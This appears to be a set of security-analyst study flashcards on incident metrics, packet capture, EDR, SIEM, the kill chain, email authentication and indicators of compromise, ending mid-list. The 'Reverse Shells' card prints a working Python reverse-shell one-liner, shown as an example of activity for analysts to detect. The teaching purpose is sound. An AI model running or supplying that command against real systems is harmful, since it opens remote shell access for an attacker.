A metric that measures the average time between the initial appearance of a security incident and its detection. It is an essential metric in security incident management as it can help organizations understand potential gaps in their response processes.
Term
Mean Time to Respond
Definition
A metric that measures the average time it takes to respond to an incident. It measures the speed and efficiency of response activities related to a detected event. For example, security software tools may detect an event quickly, but staff may not effectively respond to the alerts it generates.
Term
Mean Time to Remediate
Definition
A metric used to measure how quickly an organization can resolve an incident. MTTR is a valuable metric for evaluating an organization’s effectiveness in responding to and resolving incidents.
Term
Lessons learned
Definition
Sessions held at the end of a project or phase in which you discuss and document areas for improvement and capture lessons learned for use in future projects.
Lessons learned describe the practice of systematically capturing, analyzing and documenting the experience gained from managing and responding to security incidents, such as breaches, malware outbreaks, phishing attacks, or any similar issue that disrupts business operations or warrants incident response. The primary purpose of lessons learned in incident response is to foster a culture of continuous improvement and improve cyber resilience. By examining both successful and unsuccessful incident response actions, an organization can improve its ability to identify, detect, respond, and recover from future incidents.
Term
Wireshark
Definition
A widely used protocol analyzer.
Wireshark (wireshark.org) is an open-source graphical packet capture utility, with installer packages for most operating systems. Having chosen the interfaces to listen on, the output is displayed in a three-pane view, with the top pane showing each frame, the bottom-left pane showing the fields from the currently selected frame, and the bottom-right pane showing the raw data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the headers and payloads of hundreds of network protocols.
Term
tcpdump
Definition
tcpdump is a command line packet capture utility for Linux, though a version of the program called windump is available for Windows.
Term
TCPDUMP SWITCHES
Definition
Switch | Usage
-n | Show addresses in numeric format (don't resolve host names).
-nn | Show address and ports in numeric format.
-e | Include the data link (Ethernet) header.
-v, -vv, -vvv | Increase the verbosity of output, to show more IP header fields, such as TTL.
-X | Capture the packet payload in hex and ASCII. Use -XX to include the data link header too.
-s Bytes | By default, tcpdump captures the first 96 bytes of the data payload. To capture the full payload, set the snap length to zero with -s 0.
-w File | Write the output to a file. Packet capture files are normally identified with a .pcap extension.
-r File | Display the contents of a packet capture file.
There are numerous filter options, which can be combined using logical and (&&), or (||), not (!), and groups (parentheses). Some basic filter keywords include the following:
Keyword | Usage
host | Capture source and destination traffic from the specified IP or host name.
src / dst | Capture only source or destination traffic from the specified IP.
net | Capture traffic from the specified subnet (use CIDR notation).
port | Filter to the specified port (or range of ports, such as 21-1024). You can also use src port or dst port.
proto | Filter to a protocol, such as ip, ip6, arp, tcp, udp, or icmp.
Term
Endpoint detection and response (EDR)
Definition
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.
EDR solutions provide real-time and historical visibility into a breach, contain malware within a single host, and help facilitate remediation of the host to its original state.
EDR is a security strategy focused on the identification, tracking, and response to threats on endpoints, such as laptops, desktops, mobile devices, and servers. This differs from typical antivirus solutions focused solely on identifying and quarantining malware. EDR provides a timeline or report of events that typically extends beyond the initial infection or intrusion.
An EDR solution typically includes a centralized security monitoring platform, acquisition points, and a data analysis engine.
Term
Centralized Security Monitoring Platform
Endpoint detection and response (EDR)
Definition
Where data collected by the security solution is stored and analyzed.
Term
Endpoint Acquisition Points
Endpoint detection and response (EDR)
Definition
These are the endpoints that the platform acquires data from, such as desktop computers, etc.
Term
Data Analysis Engine
Endpoint detection and response (EDR)
Definition
This is where the data is analyzed and contextualized for real-time or historical decision-making.
Term
Advantages Offered by EDR Solutions
Definition
Detecting Malicious Activity—A key component of EDR is the advanced capability to detect and analyze malicious activity on endpoints, such as laptops, desktops, and mobile devices.
Improved Incident Response—Security teams can develop proactive measures by leveraging real-time incident response capabilities offered by the EDR solution. For example, an EDR can enable automation of response actions triggered by signs of malicious activity.
Proactive Prevention—EDR can help look for patterns and behaviors indicative of an imminent threat.
Risk Assessment—Real-time risk assessment capabilities help security teams identify and analyze risk levels associated with various incidents to craft appropriate responses better.
Incident Investigation—An incident investigation function of EDR allows security analysts to investigate incidents and accurately determine their root causes.
Term
EDR Platform Capabilities
Definition
Malware Detection—A malware detection tool will look for specific malicious behavior, such as running a specific file or DLL.
URL Filtering—URL filtering is used to block access to malicious URLs often associated with phishing attacks.
Honeypots—Honeypots are decoy systems or services that security teams set up to attract, monitor, and analyze malicious activity. They can help to block it before it causes any real damage to actual systems.
Monitoring—Monitoring tools allow an organization to track the activity of endpoints, such as system activity, application use, network activity, and firewall rules.
Orchestration—EDR tools can orchestrate the activities of other security tools in response to suspicious activity or specific event triggers.
Detect Emerging Threats—EDR tools can help organizations detect new types of attacks, such as zero-day vulnerabilities, by looking for new attack patterns on the network.
Term
Whois
Definition
Whois is a look-up service that provides information about a domain name or IP address. It queries domain registry databases for the name, address, email address, phone number, and other information about the person or entity associated with a domain name or IP address. This information is helpful in analysis, as many IP addresses and domain names are known to be malicious. Additionally, information regarding domain registration may reveal it was created very recently. New domains often indicate malware campaigns, because popular Internet destinations and businesses registered their domain names many years ago.
Term
AbuseIPDB
Definition
AbuseIPDB (abuseipdb.com) is a very popular website used by analysts to investigate suspicious traffic. The site also provides an API for automation services to integrate with SOAR platforms. A security analyst can use AbuseIPDB to identify malicious network traffic or suspicious emails by submitting an IP address to the platform's database search tool. The analyst can review historical data on the IP address provided by the platform, including any reports of abuse or malicious activity. The analyst can also view the comments section to see if other users have reported similar activity from the same IP address. Additionally, an analyst can use an API to integrate AbuseIPDB data into security tools, such as a SOAR platform, allowing for real-time monitoring and automated remediation. For example, a SOAR runbook might include steps to send an IP address collected from a SIEM alert to AbuseIPDB and, based on the results, generate an updated IDS detection rule or update a firewall to block the newly identified malicious address.
Term
Strings command
Definition
The strings command extracts and displays viewable characters stored within a binary. Using the strings command helps to reveal different characteristics of a binary, including how it operates. This can be useful for locating unique sequences of characters for custom malware signature detection and how a binary is designed to work. Strings analysis can often reveal URLs and IP addresses used by the binary.
Term
VirusTotal
Definition
VirusTotal provides a free service designed to inspect files and URLs using over 70 antimalware scanners and domain blocklisting services. The website provides a comprehensive report describing any malicious content, including the type of malware, malware names provided by various antimalware vendors, indicators, file hashes, different file names observed in the wild, relationships to domains, IP addresses and files, behavioral characteristics, and community discussion. Information collected and generated by VirusTotal is shared and distributed to antimalware developers to help improve the effectiveness of their detection engines.
Term
Sandboxing
Definition
A computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Communication links between the sandbox and the host are usually completely prohibited so that malware or faulty software can be analyzed in isolation and without risk to the host.
Term
Joe Sandbox
CrowdStrike's Hybrid Analysis
cloud-based sandbox
Definition
Joe Sandbox is a malware analysis platform that inspects executable files, suspicious URLs, and many other features. It offers easy access to behavior analysis, signature detection, and sandboxing technology to identify and analyze malicious files in a safe and controlled environment. Joe Sandbox can analyze various file types, including executables, PDF documents, Office documents, binary files, and other formats. It provides detailed reports and visualizations to help analysts understand the behavior of malware, how it operates, what it communicates with, and the environmental changes it makes.
Term
Cuckoo Sandbox
(Free & open-source)
Definition
Cuckoo Sandbox (cuckoo.cert.ee) is an open-source malware analysis tool that allows security researchers to analyze and detect advanced malware threats. Like Joe Sandbox and CrowdStrike's Hybrid Analysis, Cuckoo Sandbox uses sandboxing technology to analyze suspicious files and monitor their behavior in a safe and controlled environment. However, Cuckoo Sandbox is free and open-source, so it can run on an organization's existing infrastructure and be customized as warranted. Cuckoo Sandbox has a large community of contributors who continuously develop new plugins and features to improve its capabilities, and it has gained broad adoption in recent years.
Term
CrowdStrike's Hybrid Analysis
Definition
CrowdStrike's Hybrid Analysis is a cloud-based, proprietary solution that combines automated and human intelligence to generate threat analysis reports. CrowdStrike also offers other products, such as Falcon Sandbox, that provide real-time threat intelligence and incident response capabilities, which are unavailable in Cuckoo Sandbox or Joe Sandbox. Cloud-based platforms like Joe Sandbox and Hybrid Analysis can access and share analysis results. This feature is a concern for some highly secure environments that need to maintain full control over their environments.
Term
SIEM Capabilities
Aggregation
Definition
Collect event and log data from multiple disparate systems and provide a single view from which to process all of the collected data.
Term
SIEM Capabilities
Correlation
Definition
The ability to link events across the entire enterprise architecture to form a more complete picture of important events.
Term
SIEM Capabilities
Alerting
Definition
SIEM can be configured to perform automated analysis of event data and generate alerts to notify analysts of specific conditions or event types.
Term
SIEM Capabilities
Visibility
Definition
SIEM typically provides dashboard-style views, enabling a single, simplified view for observing critical activity.
Term
SIEM Capabilities
Compliance
Definition
SIEM facilitates compliance by producing activity reports designed to meet governance and auditing requirements.
Term
SIEM Capabilities
Data retention
Definition
SIEM platforms have the capability to store historical data which is critical for deep event analysis, digital forensics, data retention, and compliance requirements.
Term
Reconnaissance
Definition
In this stage, the attacker discovers what they can about the target and the technologies in place. This phase may use passive information gathering and active scanning of the target network. This phase's desired outcome will be identifying one or more potential exploitable vulnerabilities.
Term
Weaponization
Definition
The attacker identifies a method by which identified vulnerabilities can be exploited, often through "weaponized code," such as carefully crafted scripts, custom malware binaries, compromised websites, social engineering, and other methods.
Term
Delivery
Definition
The attacker identifies a vector to transmit the weaponized code to the target environment, such as via an email attachment or on a USB drive.
Term
Exploitation
Definition
This results in the weaponized code running on the target system. For example, a phishing email may trick the user into running the code, while a drive-by download would execute on a vulnerable system without user intervention.
Term
Installation
Definition
This mechanism enables the weaponized code to run a remote access tool and achieve persistence on the target system.
Term
Command and Control (C&C or C2)
Definition
The weaponized code establishes a reliable channel to a remote server used to manage the session and often downloads additional tools to help advance the attack.
Term
Actions on Objectives
Definition
In this phase, the attacker typically uses the access they have achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however.
Term
Diamond Model of Intrusion Analysis
Definition
A framework for analyzing cybersecurity incidents.
Understand the Diamond Model of Intrusion Analysis
The Diamond Model of Intrusion Analysis is set out in a paper by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz (activeresponse.org/wp-content/uploads/2013/07/diamond.pdf). The Diamond Model suggests a framework to analyze an intrusion event (E) by exploring the relationships among four core features: adversary, capability, infrastructure, and victim. These four features are represented by the four vertices of a diamond shape. Each event may also be described by meta-features, such as date/time, kill chain phase, result, and so on. Each feature is also assigned a confidence level (C), indicating data accuracy or the reliability of a conclusion or assumption assigned to the value by analysis.
Each event is then defined by tuples, and additional information about each feature can be nested using the following format:
E = {
    {Adversary, C_adversary},
    {Capability, C_capability},
    {Infrastructure, C_infrastructure},
    {Victim, C_victim} = {
        {IP, C_ip},
        {Port, C_port},
        {Process, C_process}
    },
    {Timestamp, C_timestamp},
    { ... }
}
The power of the model lies in the ability to pivot along the vertices of the diamond to produce a complete analysis and correlation of the IoCs that represent the event.
Adversary—This element represents the individual or group responsible for the intrusion. Adversaries can include nation-states, criminal organizations, hacktivists, or malicious insiders.
Infrastructure—This element refers to the tools and resources used by the adversary to carry out the intrusion. Tools include malware, exploit kits, command and control servers, and other types of network infrastructure.
Capability—This element describes the technical skills and aptitude of the adversary, such as their ability to craft advanced techniques to evade detection, exploit vulnerabilities, and persist on target systems.
Victim—The victim element represents the organization or individual the adversary has targeted, such as government agencies, businesses, or individuals. Victims vary in size, industry type, and defensive capabilities.
Term
Open Source Security Testing Methodology Manual (OSSTMM)
Definition
Developed by the Institute for Security and Open Methodologies (ISECOM), this manual outlines every area of an organization that needs testing and goes into details about how to conduct the relevant tests.
The Open Source Security Testing Methodology Manual (OSSTMM) is a framework that provides a comprehensive and structured approach to security testing. The OSSTMM covers various aspects of security testing, including operational, physical, and wireless security testing. It provides a standardized methodology for conducting security tests and assessing the effectiveness of security controls.
Term
Email Message Internet Header Analysis
Definition
An email's Internet header contains address information for the recipient and sender, plus details of the servers handling the message's transmission, using the fields set out in the Simple Mail Transfer Protocol (SMTP). When an email is created, the mail user agent (MUA) creates an initial header and forwards the message to a mail delivery agent (MDA). The MDA should check that the sender is authorized to issue messages from the domain. Assuming the email is not being delivered locally at the same domain, the MDA adds or amends its own header and then transmits the message to a message transfer agent (MTA). The MTA routes the message to the recipient, using DNS to locate the recipient's MTA, with the message passing via one or more additional MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA adds information to the header.
One element of email headers that is frequently exploited is the fact that there are three "sender" address fields:
Display from—The sender's email address. This is the field displayed by an email client as the "From" field. It is submitted using a From: header in the message body and officially designated RFC5322.From. This field can be populated by both a "friendly" name string and the email address in angle brackets. Some email clients suppress the display of the email address part. This is bad practice as it makes it hard for the user to identify the message's source. Frequently, adversaries will enter a trustworthy domain string in the first part, hoping that the mail client will display that rather than the actual address. Compare:
Friendly Guy<friendlyguy@isp.foo>
with:
friendlyguy@isp.foo<friendlyguy@xyz.foo>.
Envelope from—A return address for use if the email is rejected by the recipient MTA. The value of this field is submitted using the MAIL FROM SMTP command and is officially designated as RFC5321.MailFrom. The mail client normally hides this field. It can take various labels, including return-path.
Received from/by—A list of the MTAs that processed the email. Each MTA identifies itself and the server that sent the message. If an adversary is spoofing a domain, the true origin of the message is likely to be revealed by examining this list of servers. When starting a session with another SMTP server, a server identifies itself using the HELO/EHLO string.
Headers aren't exposed to the user by most email applications, which is why they're usually not a factor in an average user's judgment. You can view and copy headers from a mail client via a message properties/options/source command. MTAs can add a lot of information in each received header, such as the results of spam checking. If you use a plain text editor to view the header, it can be difficult to identify where each part begins and ends. Fortunately, plenty of tools are available to parse headers and display them in a more structured format. One example is the Message Analyzer tool, available as part of the Microsoft Remote Connectivity Analyzer (testconnectivity.microsoft.com). This will lay out the hops that the message took more clearly and break out the headers added by each MTA. You can also implement software that inspects headers and triggers an alert if the headers match known malicious values.
The following example shows the headers from a spam message. Some of the fields have been removed, and some of the original identifying information redacted and replaced with placeholders:
Received: from protection2.outlook.com (2603:10a6:208:ac::18) by exchangelabs.com with HTTPS ; Tue, 24 Dec 2019 19:30:08 +0000
Received: from protection1.outlook.com (10.152.16.53) by protection2.outlook.com (10.152.17.88) with Microsoft SMTP Server ; Tue, 24 Dec 2019 19:30:08 +0000
Authentication-Results: spf=none (sender IP is w.x.y.z) smtp.mailfrom=spam.foo; hotmail.com; dkim=none (message not signed) header.d=none;hotmail.com; dmarc=none action=none header.from=spam.foo;
Received-SPF: None (protection.outlook.com: spam.foo does not designate permitted sender hosts)
These fields show the receipt of the email by the recipient's mail gateway, which performs analysis on it. The sender's domain is identified as spam.foo.
Received: from openrelay.foo (w.x.y.z) by protection1.outlook.com (10.152.16.89) with Microsoft SMTP Server ; Tue, 24 Dec 2019 19:30:06 +0000
This field shows the SMTP server that originated the message. It comes from a different domain than spam.foo. The openrelay.foo domain and IP address are on many mail blacklists.
Subject: Your account is blocked by the administrator
The from and return-path fields list the same sender address, but note the attempt to disguise the nature of the sender by impersonating a Gmail account administrator.
X-MS-Exchange-Organization-ExpirationStartTime: 24 Dec 2019 19:30:07.8963 (UTC)
The X- headers indicate custom headers that are controlled by the SMTP server administrator. They are often used for message authentication and spam analysis, in this case by Microsoft (docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spam-message-headers).
Term
Malicious Payload
A malicious payload is some sort of code implemented within the message body. There are two main types of malicious payload:
Definition
- Exploit—The message data contains scripts or objects that target some vulnerability in the mail client, such as incorrectly processing RTF or HTML-based messages, image files, or S/MIME digital signatures. In some cases, these may be activated via the email client's preview feature. It is important to keep email client applications up to date with the latest patches.
- Attachment—The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension (of the form file.pdf.exe).
Term
Embedded Links
Definition
As users are slightly less likely to open suspicious attachments these days, another popular vector is to embed a link to a malicious site within the email body. As with email sender addresses, a link can be composed of a friendly string plus the URL. Most mail applications should display the full URL of the link rather than just the friendly string, which can assist the user in diagnosing whether to trust it or not. However, the best advice is never to use links from email messages. Even if the user trusts the communication, they should still locate the site referred to manually via the browser.
It is also possible to construct links that will perform an exploit against some local vulnerability in the email client application or the underlying OS.
Term
Email Signature Block
Definition
A missing or poorly formatted email signature block is an indicator of a phishing message. Conversely, a spear phisher might have obtained samples of a company's signature block and constructed a convincing facsimile. This might be used to embed malicious links and incorrect or hacked contact details.
Term
Malicious Attachments
Definition
Emails can contain malicious attachments, such as malware executables hidden in a compressed file. File attachments should be scanned by antimalware at the email gateway and on the user desktop or email client to locate and remove these files. Despite these best efforts, malicious file attachments are likely to still pass through undetected.
When investigating email attachments, it is crucial to obtain the hash of the attachment, as this can be used to identify the file uniquely. Comparing the hash to known malicious file hashes clearly identifies a match. Oftentimes, malicious file attachments are not detected by antimalware or groupware detection engines even after manual inspection validates the attachment as malicious. In this case, custom detection rules designed to use the file hash can locate any other instances of the malicious file in other mailboxes or anywhere else.
Term
hash
Definition
The theoretically indecipherable fixed-length output of the hashing process.
Term
Sender Policy Framework (SPF)
Definition
A DNS record identifying hosts authorized to send mail for the domain.
SPF is an important component to email analysis. When analyzing email headers, comparing the sender to what is listed in an SPF record can reveal whether the email is spoofed or requires further investigation.
Sender Policy Framework (SPF) is a DNS TXT record that identifies the hosts authorized to send emails for the domain. It is common for emails to be sent from different domains, for example, when a third party hosts an organization's email or when an organization uses a marketing service to send and collect customer survey information. IP addresses, CIDR address blocks, or hostnames identify the authorized mail servers. An SPF record can also help determine what to do with email originating from a location not listed in the record. Actions include rejecting them (-all), flagging them (~all), or accepting them (+all).
Term
DomainKeys Identified Mail (DKIM)
Definition
A cryptographic authentication mechanism for mail utilizing a public key published as a DNS record.
DomainKeys Identified Mail (DKIM) provides a cryptographic authentication mechanism for DNS records and supplements SPF. To configure DKIM, the organization uploads a public key as a TXT record in the DNS server. When outgoing email is processed, the domain MTA calculates a hash value on selected message headers and signs the hash using its private key. The hash value is added to the message as a DKIM signature, along with the sequence of headers used as inputs for the hash, the hash algorithm, and the selector record, to allow the receiving server to locate the correct DKIM DNS record.
The receiving MTA looks up the DKIM DNS record, obtains the public key, and uses it to decrypt each hash. It calculates its own header hash and compares the two. If they match, the message origin has been successfully authenticated.
Term
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Definition
A framework for ensuring proper application of SPF and DKIM, utilizing a policy published as a DNS record.
The Domain-based Message Authentication, Reporting, and Conformance (DMARC) framework ensures that SPF and DKIM are being utilized effectively. A DMARC policy is published as a DNS record. It specifies an alignment mechanism to verify that the domain identified in the rule header from field matches the domain in the envelope from field (return-path) in an SPF check and/or the domain component in a DKIM signature. DMARC can use either SPF or DKIM or both. DMARC specifies a more robust policy mechanism for senders to specify how DMARC authentication failures should be treated (flag, quarantine, or reject), plus mechanisms for recipients to report DMARC authentication failures to the sender. Recipients can submit an aggregate report of failure statistics and a forensic report of specific message failures.
Term
Cousin Domains
Definition
SPF, DKIM, and DMARC do not solve the problem of cousin or look-alike domains. These are domain names or domain name parts that closely resemble an organization's real domain. Phishers will also exploit the fact that many organizations use hosted email services, especially for business tasks like marketing and customer service and support ticketing. When official emails arrive from domains such as support@realcompany.serviceprovider.foo, it makes it much easier for a phisher to succeed with an impersonation attack using an email address such as support@reelcompany.serviceprovider.foo or support@realcompany.srviceprovider.foo.
Term
Important Linux Commands
Definition
Command | Description
ssh | Used to remotely access a server and obtain shell access for administrative purposes.
wget | Used to interact with a web server using a command line interface.
curl | Similar to wget but includes more functionality.
telnet | A cleartext protocol used to remotely access a server. Telnet has some well-known exploitable vulnerabilities.
ftp | A cleartext protocol used to perform file transfer. FTP has some well-known exploitable vulnerabilities.
arp or ss | Used to identify physical addresses of hosts.
ip or ifconfig | Used to identify and change network configuration information.
whoami | Used to identify the current session user. Often used after obtaining shell access to determine privilege levels.
netstat | Used to display network activity, in particular active IP addresses and ports.
Term
Important Windows Commands
Definition
Command | Description
netstat | Used to display network activity, in particular active IP addresses and ports.
ping | Used to test connectivity among network devices, can also be abused to carry data.
ipconfig | Used to display IP address configuration information.
nslookup | Used to interact with DNS using the command line.
tasklist | Used to display the processes running on a system.
net <option> | The net command is used to perform many administrative tasks.
netsh | Allows local and remote configuration of network-related services.
wmic | A command line interface to Windows Management Instrumentation (WMI).
Term
Important PowerShell Commands
Definition
Command | Description
Invoke-Request | Used to remotely issue commands to a Windows system.
Invoke-WebRequest | Used to interact with a system using HTTP or HTTPS.
DownloadString | Used to download information from a web server, such as a malicious script or payload.
Start-Process | Starts a new process, often to load malware or a rogue process.
Get-WMIObject | Used to collect information from a host using Windows Management Instrumentation (WMI).
Get-Process | Used to display processes configured on a system.
Term
Reverse Shells
Definition
Reverse shells are very popular as they consistently work even if a firewall is present. A reverse shell describes making a victim system connect back to the attacker's machine to establish shell access. The chart below lists specific examples of commands used when creating a reverse shell.
export RHOST="10.20.100.1";export RPORT=8181;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Reverse shell commands are unlikely to represent normal activity. Any indication that one of the reverse shell commands has been used indicates suspicious activity and potential unauthorized access (potential because the reverse shell may not have worked to establish a shell).
The other commands listed for Windows, PowerShell, and Linux warrant further investigation as an engineer or administrator may have used them to troubleshoot a problem, reconfigure a service, obtain remote access for legitimate purposes, or complete a change request. The objective is to determine what scenario sufficiently explains why the commands were used. Even if an authorized employee used the commands, the reason they were used may not be justified and could indicate malicious intent or a failure to follow established policy.
Term
Abnormal Account Activity
Definition
Monitoring the use of user accounts is an effective way to identify suspicious activity.
Some examples include the following:
- A user account for an employee with well-defined working hours being used during the night
- A user account provisioned to only work on desktop computers being used on a server computer
- A user account created on a local computer or created by a user without authorization to create accounts
- An account being added to a group unexpectedly or added by an unauthorized individual
Term
impossible travel.
Definition
A tracking of information such as GPS address, IP address, or user's device to pinpoint a user's location and determine whether a behavior was physically possible.
An example of this would be a user account logging in from an IP address located in New York and then logging in again 15 minutes later from Brussels. This is suspicious because it is physically impossible to travel that distance in 15 minutes. Sometimes this type of event is normal, for example, if a user utilizes a VPN with overseas service locations.
Term
Abnormal Behavior and Patterns
Definition
Monitoring computer activity may also reveal other problematic activities or sequences of activities that match a known attack pattern such as the following:
- Evidence of communication with known malicious IP addresses or domain names
- Abnormal communication patterns such as encrypted communication between a device and a remote host every two minutes or abnormal protocol activity such as gigabytes of DNS traffic or ping requests that do not receive responses or have unusual packet sizes
- Evidence of traffic on ports associated with C&C traffic using encoded communications and commands
- Evidence that a user received an email with a suspicious link, visited the site, launched an executable, and established a connection to a system located on the Internet
Term
User and Entity Behavior Analytics (UEBA)
Definition
These products scan indicators from multiple intrusion detection and log sources to identify anomalies. They are often integrated with security information and event management (SIEM) platforms.
A user and entity behavior analytics (UEBA) solution supports identification of malicious behaviors from comparison to a baseline. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. The complexity of determining baselines and reducing false positives means that UEBA solutions are often heavily dependent on AI and machine learning.
Term
Distributed denial of service attack (DDoS attack)
Definition
An attack that uses multiple compromised hosts (a botnet) to overwhelm a service with requests or response traffic.
Term
traffic spike
Definition
A sharp increase in connection requests in comparison with a baseline.
Term
Bandwidth consumption
Definition
Bandwidth consumption describes unusually high and possibly mysterious traffic volumes over a sustained period. Some traffic spikes and heavy utilization reflect regular activity, such as network-based backups, data replication, website traffic in response to a marketing campaign, and other similar scenarios.
- Worm activity is an issue which typically manifests as high volumes of traffic saturating switches and router interfaces.
- A reflection or amplification attack is another issue. In a reflection attack, the attacker spoofs the victim's IP address and uses the spoofed IP to communicate with multiple servers. The servers respond to the victim, overwhelming it with traffic.
- A DNS reflection attack allows a small DNS request with a spoofed source IP to generate a very large response. DNS reflection attacks are effective for generating bandwidth-busting traffic volumes while only requiring small requests from attackers or bots.
- The Network Time Protocol (NTP) monlist command can be abused to generate large traffic volumes. For example, a simple, small query for the last 600 machines contacted by the NTP server results in a large response (as well as exposing network hostnames). Like a DNS amplification attack, this characteristic allows a small request to generate a large response.
Term
DDoS Mitigation
Definition
Real-time analysis of log files to identify suspicious traffic and send it to a black hole or sinkhole is effective, especially if the response is automated. Geolocation and IP reputation analysis can also help identify and block suspicious traffic.
A popular and highly effective approach is implementing cloud-based protections for Internet-facing systems. Services like Cloudflare (cloudflare.com) and Imperva (imperva.com) inspect traffic before it reaches an organization's infrastructure. The organization's firewall is configured to allow traffic sourced from the cloud provider only. Public DNS records direct all requests to the cloud provider, where traffic is inspected and only passed to the organization's systems if legitimate.
Term
beaconing
Definition
A means for a network node to advertise its presence and establish a link with other nodes, such as the beacon management frame sent by an AP. Legitimate software and appliances do this, but it is also associated with Remote Access Trojans (RAT) communicating with a Command & Control server.
Term
Internet relay chat (IRC)
Definition
A group communications protocol that enables users to chat, send private messages, and share files.
IRC networks use discrete channels, representing individual forums used by clients to chat. With IRC, it is easy for an attacker to set up an IRC server and begin sending interactive control directives to individual bots connected to the IRC server. The use of IRC for C&C is less common than it once was. IRC traffic is easy to detect, and organizations should block it.
Term
HTTP and HTTPS
Definition
Communication using HTTP/HTTPS is necessary for almost every network, and blocking it is not feasible. HTTPS traffic makes it difficult to separate malicious traffic from legitimate traffic, so attackers frequently use it for C&C. Proxies can help mitigate this when configured to decrypt and inspect encrypted traffic. Other strategies include IP address and domain reputation checking, DNS blackholes, and certificate inspection (encrypted bot traffic often uses self-signed certificates).
Term
Domain Name System (DNS)
Definition
DNS traffic is often not inspected or filtered, and attackers use this as an opportunity to evade detection. DNS can operate as a C&C channel and is highly effective because the bot does not need direct Internet access. The bot uses a local DNS server that forwards lookups outside the organization, receiving a response with a control message. Attackers send commands as request or response queries, making them longer and more complicated than typical DNS traffic, which can be used as an indicator of compromise. Sometimes, attackers break control messages into several query fragments to avoid detection. Another sign of a C&C activity via DNS is when the same query is repeated several times; this indicates that the bot is checking the control server for commands.
Term
Social Media Websites
Definition
Facebook, Twitter, LinkedIn, and other social media sites have been vectors for C&C. Social media platforms like these allow attackers to issue commands through the platforms' messaging capability. For example, many organizations allow unrestricted LinkedIn traffic, which allows an attacker to issue commands to bots through an active account profile using fields like employment status, employment history, status updates, and others. Sometimes C&C can leverage hashtags to encode command strings used by bots. These attacks have become less prevalent as social media platforms incorporate controls to limit abuse.
Term
Media and Document Files
Definition
Media file formats like JPEG, MP3, and MPEG use metadata to describe images, audio, and video. An attacker can embed control messages inside this metadata, then send the media file to bots over any communication channels supporting media sharing. Monitoring systems do not typically inspect media metadata, allowing the attacker to evade detection.
Term
ARP spoofing, or ARP poisoning
Definition
A network-based attack where an attacker with access to the target local network segment redirects an IP address to the MAC address of a computer that is not the intended recipient. This can be used to perform a variety of attacks, including DoS, spoofing, and Man-in-the-Middle.
Irregular peer-to-peer communication may also indicate various kinds of on-path attacks. ARP spoofing, or ARP poisoning, describes when an attacker redirects an IP address to a MAC address not associated with its proper destination. Attackers execute this spoofing attack by continuously sending cache update requests to the victim using erroneous address information. ARP always overwrites its records with the latest request, so flooding the cache with spoofed requests ensures it is corrupted. An IDS such as Snort or Suricata effectively identifies suspicious traffic because ARP poisoning attacks generate much more ARP traffic than normal. The command arp -a can be used to manually inspect the local machine's ARP cache and verify that unique MAC address values are associated with each dynamic entry in the table.
Term
rogue device
Definition
An unauthorized device or service, such as a wireless access point, DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network.
A rogue device is any unauthorized electronic equipment attached anywhere in an organization's environment. Examples include a USB storage device attached to a computer to copy sensitive data, an extra Wi-Fi adapter installed on an employee's workstation and used to establish a wireless hotspot, or an employee's personal, unsecured smartphone connected to the network. Rogue system detection refers to identifying (and removing) unauthorized devices.
Term
perform rogue machine detection:
Definition
- Visual inspection of ports/switches—Simply looking for out-of-place devices or odd cabling connections is very effective. Looking inside cabinets and under desks for tape-mounted Raspberry Pi and other microcomputers is very important.
- Network mapping/host discovery—Network scans can identify hosts and use banner grabbing and fingerprinting to collect valuable information. DHCP logs are also very helpful.
- Wireless monitoring—Discover unknown or unidentifiable service set identifiers (SSIDs) showing up within range of the office.
- Packet sniffing and traffic flow—Reveal the use of unauthorized protocols on a network and suspicious peer-to-peer communication.
- NAC and intrusion detection—Security suites and appliances can combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network.
Term
Protecting Against Rogue Devices
Definition
Rogue devices depend upon network access. By implementing port-based access control or 802.1x network access control, unauthorized devices are much less likely to be able to gain network access. Additionally, implementing these controls can help make identifying rogue devices easier.
Term
Scan/Sweep Events
Definition
The initial stages of an attack often include network scans and ping sweeps to identify hosts and services on the network, including any exploitable vulnerabilities. The term scan can refer specifically to a port scan directed at a single host (also known as fingerprinting) to enumerate which ports are open and the software and firmware in use. A sweep refers to probing a range of IP addresses to discover hosts.
Authorized network scans should be performed from pre-authorized devices. Scans and network sweeps are useful tools in the security analyst's arsenal as they help to identify issues such as unauthorized devices and software or misconfigured hosts. Scans originating from unauthorized locations and devices should be immediately investigated. Intrusion detection systems can detect most types of scanning activity, though there are some methods of evading detection, such as sparse scanning.
Scan sweeps on Internet-facing systems are a common occurrence and less likely to be prioritized for investigation. Identification of other indicators of compromise can be compared to historical data to determine if the intrusion correlates to scanning activity and reveals additional information about the attacker.
Term
non-standard port
Definition
Communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol.
Term
mismatched port/application traffic
Definition
Communicating non-standard traffic over a well-known or registered port.
Term
Non-standard Port Mitigation
Definition
The best way of mitigating use of non-standard ports is to configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces. Unfortunately, this type of policy is difficult to put into practice, as it tends to cause numerous support issues for legitimate applications. Configuration documentation should also show which server ports are allowed on any given host type. This can then be used to create detection rules for non-standard port usage. Detection rules can also be configured to detect mismatched protocol usage over a standard port.
Term
Shell and Reverse Shell
Definition
As well as beaconing and data transfer, adversaries will often want to use a Remote Access Tool/Trojan (RAT) to obtain a shell on the compromised system and run commands. A shell is where the attacker opens a listening port that exposes the command prompt on the local host and connects to that port from a remote host. A reverse shell is where the attacker opens a listening port on the remote host and causes the infected host to connect to it. Traffic received by the infected host is then redirected to the command prompt. A reverse shell is typically used to exploit organizations that have not configured outbound traffic filtering at the firewall.
Term
Processor usage
